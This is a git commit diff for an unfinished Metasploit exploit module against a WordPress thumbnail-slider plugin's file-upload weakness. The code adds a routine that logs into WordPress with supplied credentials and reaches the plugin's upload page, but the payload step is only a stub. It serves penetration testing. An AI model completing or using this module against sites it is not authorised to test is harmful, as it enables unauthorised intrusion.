authenticating to WordPress

2018-07-25 14:22:24 -05:00 · 2018-07-25 14:22:24 -05:00 · 8f89275df8
parent 668bcb38cb
commit 8f89275df8
1 changed files with 58 additions and 1 deletions
--- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
+++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
@ -45,12 +45,69 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def check
+    # check for WordPress
+    # check if plugin is installed
  end

  # log into Wordpress
  # access 'manage images' page
  # upload file
-  def exploit
+  def login
+    wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
+    res = send_request_cgi(
+    'method'  =>  'GET',
+    'uri'     =>  wp_uri
+    )
+
+    if res && res.body.include?("WordPress") && res.body.include?("200")
+      print_status("WordPress accessed")
+    else
+      fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
    end

+    redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
+    cookies = res.get_cookies
+    wp_login_res = send_request_cgi(
+      'method'  =>  'POST',
+      'uri'     =>  wp_uri,
+      'cookie'  =>  cookies,
+      'vars_post' => {
+        'log' =>  datastore['USERNAME'],
+        'pwd' =>  datastore['PASSWORD'],
+        'wp-submit' =>  'Log In',
+        'redirect_to' => redirect_uri
+      }
+    )
+
+    auth_cookies = wp_login_res.get_cookies
+    auth_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  redirect_uri,
+      'cookie'  =>  auth_cookies
+    )
+
+    return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
+
+    print_good("Logged into WordPress")
+    upload_payload(auth_cookies)
+  end
+
+  def upload_payload(cookies)
+    # attempt to access plugins page
+    plugin_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
+      'cookie'  =>  cookies
+    )
+
+    unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
+      fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page")
+    end
+
+    # generate payload
+  end
+
+  def exploit
+   login
+  end
 end